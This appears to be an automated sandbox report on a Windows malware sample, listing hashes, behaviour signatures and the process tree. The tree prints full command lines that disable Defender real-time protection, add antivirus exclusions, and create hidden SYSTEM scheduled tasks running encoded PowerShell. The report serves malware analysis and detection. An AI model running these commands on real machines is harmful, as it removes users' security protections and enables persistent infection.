Analysis

  • max time kernel
    90s
  • max time network
    91s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    04-06-2024 01:22

General

  • Target

    987e81eaba927077be968768fa337bae2bbe38310a4fec0593c356e677e9c236.exe

  • Size

    6.3MB

  • MD5

    2570433695e66597cf18a2d427c5366d

  • SHA1

    88c9e4e3d7562c2b538b19066ceffd3bd2b80da1

  • SHA256

    987e81eaba927077be968768fa337bae2bbe38310a4fec0593c356e677e9c236

  • SHA512

    cf220112dba66758512dcc0a37df298d25ab1c5390eb45826aee9690907ad9c94a3e6272419e1bd0c64a6af518b4945336f21aa8822e6cdfc545a604d7a578b6

  • SSDEEP

    98304:91Oih9g3v564EOC2yQlQyNky6wJ9cpq5rMlGRrodUkZ+52LYib/Z6fm1xE:91Oyif5sH6QyayJ6GFodL+52LNFE

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Windows security bypass 2 TTPs 40 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 19 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops file in System32 directory 27 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • Creates scheduled task(s) 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 54 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\987e81eaba927077be968768fa337bae2bbe38310a4fec0593c356e677e9c236.exe
    "C:\Users\Admin\AppData\Local\Temp\987e81eaba927077be968768fa337bae2bbe38310a4fec0593c356e677e9c236.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2080
    • C:\Users\Admin\AppData\Local\Temp\7zS25D8.tmp\Install.exe
      .\Install.exe /IwVludidZTK "385120" /S
      2⤵
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Loads dropped DLL
      • Enumerates system info in registry
      • Suspicious use of WriteProcessMemory
      PID:2776
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2964
        • C:\Windows\SysWOW64\forfiles.exe
          forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2592
          • C:\Windows\SysWOW64\cmd.exe
            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2652
            • \??\c:\windows\SysWOW64\reg.exe
              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
              6⤵
                PID:2668
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2672
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:2680
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                6⤵
                  PID:2716
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:2656
              • C:\Windows\SysWOW64\cmd.exe
                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                5⤵
                  PID:2604
                  • \??\c:\windows\SysWOW64\reg.exe
                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                    6⤵
                      PID:2556
                • C:\Windows\SysWOW64\forfiles.exe
                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                  4⤵
                    PID:2596
                    • C:\Windows\SysWOW64\cmd.exe
                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                      5⤵
                        PID:2788
                        • \??\c:\windows\SysWOW64\reg.exe
                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                          6⤵
                            PID:2580
                      • C:\Windows\SysWOW64\forfiles.exe
                        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                        4⤵
                          PID:2696
                          • C:\Windows\SysWOW64\cmd.exe
                            /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                            5⤵
                              PID:2456
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                6⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Drops file in System32 directory
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2644
                                • C:\Windows\SysWOW64\gpupdate.exe
                                  "C:\Windows\system32\gpupdate.exe" /force
                                  7⤵
                                    PID:2764
                          • C:\Windows\SysWOW64\forfiles.exe
                            "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                            3⤵
                              PID:2436
                              • C:\Windows\SysWOW64\cmd.exe
                                /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                4⤵
                                  PID:2744
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                    5⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Drops file in System32 directory
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2636
                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                      "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                      6⤵
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2260
                              • C:\Windows\SysWOW64\schtasks.exe
                                schtasks /CREATE /TN "btZaCbGShXZoJDfvCg" /SC once /ST 01:24:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\DHAkwqCFFocyzXL\FfKflKD.exe\" PP /bPJdidHBBq 385120 /S" /V1 /F
                                3⤵
                                • Drops file in Windows directory
                                • Creates scheduled task(s)
                                PID:2372
                              • C:\Windows\SysWOW64\forfiles.exe
                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn btZaCbGShXZoJDfvCg"
                                3⤵
                                  PID:2020
                                  • C:\Windows\SysWOW64\cmd.exe
                                    /C schtasks /run /I /tn btZaCbGShXZoJDfvCg
                                    4⤵
                                      PID:1812
                                      • \??\c:\windows\SysWOW64\schtasks.exe
                                        schtasks /run /I /tn btZaCbGShXZoJDfvCg
                                        5⤵
                                          PID:1804
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2776 -s 596
                                      3⤵
                                      • Loads dropped DLL
                                      • Program crash
                                      PID:2780
                                • C:\Windows\system32\taskeng.exe
                                  taskeng.exe {97C912D2-046B-47C5-AD47-0B5D7B995642} S-1-5-18:NT AUTHORITY\System:Service:
                                  1⤵
                                    PID:868
                                    • C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\DHAkwqCFFocyzXL\FfKflKD.exe
                                      C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\DHAkwqCFFocyzXL\FfKflKD.exe PP /bPJdidHBBq 385120 /S
                                      2⤵
                                      • Executes dropped EXE
                                      • Drops file in System32 directory
                                      • Modifies data under HKEY_USERS
                                      PID:2104
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                        3⤵
                                          PID:348
                                          • C:\Windows\SysWOW64\forfiles.exe
                                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                            4⤵
                                              PID:2292
                                              • C:\Windows\SysWOW64\cmd.exe
                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                5⤵
                                                  PID:1700
                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                    6⤵
                                                      PID:1600
                                                • C:\Windows\SysWOW64\forfiles.exe
                                                  forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                  4⤵
                                                    PID:2136
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                      5⤵
                                                        PID:2320
                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                          6⤵
                                                            PID:2284
                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                        4⤵
                                                          PID:2088
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                            5⤵
                                                              PID:2144
                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                6⤵
                                                                  PID:2296
                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                              forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                              4⤵
                                                                PID:2316
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                  5⤵
                                                                    PID:2112
                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                      6⤵
                                                                        PID:2812
                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                    forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                    4⤵
                                                                      PID:2804
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                        5⤵
                                                                          PID:2432
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                            6⤵
                                                                            • Command and Scripting Interpreter: PowerShell
                                                                            • Drops file in System32 directory
                                                                            • Modifies data under HKEY_USERS
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:2304
                                                                            • C:\Windows\SysWOW64\gpupdate.exe
                                                                              "C:\Windows\system32\gpupdate.exe" /force
                                                                              7⤵
                                                                                PID:1760
                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                        schtasks /CREATE /TN "gkPSmwOOT" /SC once /ST 00:52:43 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                        3⤵
                                                                        • Creates scheduled task(s)
                                                                        PID:572
                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                        schtasks /run /I /tn "gkPSmwOOT"
                                                                        3⤵
                                                                          PID:580
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /DELETE /F /TN "gkPSmwOOT"
                                                                          3⤵
                                                                            PID:2288
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                                                            3⤵
                                                                              PID:1936
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                                                                4⤵
                                                                                • Modifies Windows Defender Real-time Protection settings
                                                                                PID:944
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                                                              3⤵
                                                                                PID:2152
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                                                                  4⤵
                                                                                  • Modifies Windows Defender Real-time Protection settings
                                                                                  PID:1556
                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                schtasks /CREATE /TN "gHaUAkFbh" /SC once /ST 00:20:31 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                3⤵
                                                                                • Creates scheduled task(s)
                                                                                PID:1540
                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                schtasks /run /I /tn "gHaUAkFbh"
                                                                                3⤵
                                                                                  PID:1768
                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                  schtasks /DELETE /F /TN "gHaUAkFbh"
                                                                                  3⤵
                                                                                    PID:2388
                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
                                                                                    3⤵
                                                                                      PID:1400
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                        4⤵
                                                                                          PID:2964
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                            5⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Drops file in System32 directory
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:2084
                                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                              6⤵
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:1880
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:32
                                                                                        3⤵
                                                                                          PID:2876
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:32
                                                                                            4⤵
                                                                                            • Windows security bypass
                                                                                            PID:820
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:64
                                                                                          3⤵
                                                                                            PID:1968
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:64
                                                                                              4⤵
                                                                                              • Windows security bypass
                                                                                              PID:2260
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:32
                                                                                            3⤵
                                                                                              PID:2352
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:32
                                                                                                4⤵
                                                                                                  PID:1808
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:64
                                                                                                3⤵
                                                                                                  PID:1128
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:64
                                                                                                    4⤵
                                                                                                      PID:2516
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    cmd /C copy nul "C:\Windows\Temp\QqEAMUespgTHJnVz\fZNkQiVY\ODYHBdNCcqPVDlYF.wsf"
                                                                                                    3⤵
                                                                                                      PID:2436
                                                                                                    • C:\Windows\SysWOW64\wscript.exe
                                                                                                      wscript "C:\Windows\Temp\QqEAMUespgTHJnVz\fZNkQiVY\ODYHBdNCcqPVDlYF.wsf"
                                                                                                      3⤵
                                                                                                      • Modifies data under HKEY_USERS
                                                                                                      PID:340
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:32
                                                                                                        4⤵
                                                                                                        • Windows security bypass
                                                                                                        PID:2040
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:64
                                                                                                        4⤵
                                                                                                        • Windows security bypass
                                                                                                        PID:1204
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:32
                                                                                                        4⤵
                                                                                                        • Windows security bypass
                                                                                                        PID:1828
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:64
                                                                                                        4⤵
                                                                                                        • Windows security bypass
                                                                                                        PID:2824
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:32
                                                                                                        4⤵
                                                                                                        • Windows security bypass
                                                                                                        PID:344
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:64
                                                                                                        4⤵
                                                                                                        • Windows security bypass
                                                                                                        PID:2280
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:32
                                                                                                        4⤵
                                                                                                        • Windows security bypass
                                                                                                        PID:2296
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:64
                                                                                                        4⤵
                                                                                                        • Windows security bypass
                                                                                                        PID:2112
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:32
                                                                                                        4⤵
                                                                                                        • Windows security bypass
                                                                                                        PID:2204
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:64
                                                                                                        4⤵
                                                                                                        • Windows security bypass
                                                                                                        PID:2800
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nivjmgppGaMJQQVB" /t REG_DWORD /d 0 /reg:32
                                                                                                        4⤵
                                                                                                        • Windows security bypass
                                                                                                        PID:2628
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nivjmgppGaMJQQVB" /t REG_DWORD /d 0 /reg:64
                                                                                                        4⤵
                                                                                                        • Windows security bypass
                                                                                                        PID:808
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                        4⤵
                                                                                                        • Windows security bypass
                                                                                                        PID:704
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                        4⤵
                                                                                                        • Windows security bypass
                                                                                                        PID:1492
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy" /t REG_DWORD /d 0 /reg:32
                                                                                                        4⤵
                                                                                                        • Windows security bypass
                                                                                                        PID:1944
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy" /t REG_DWORD /d 0 /reg:64
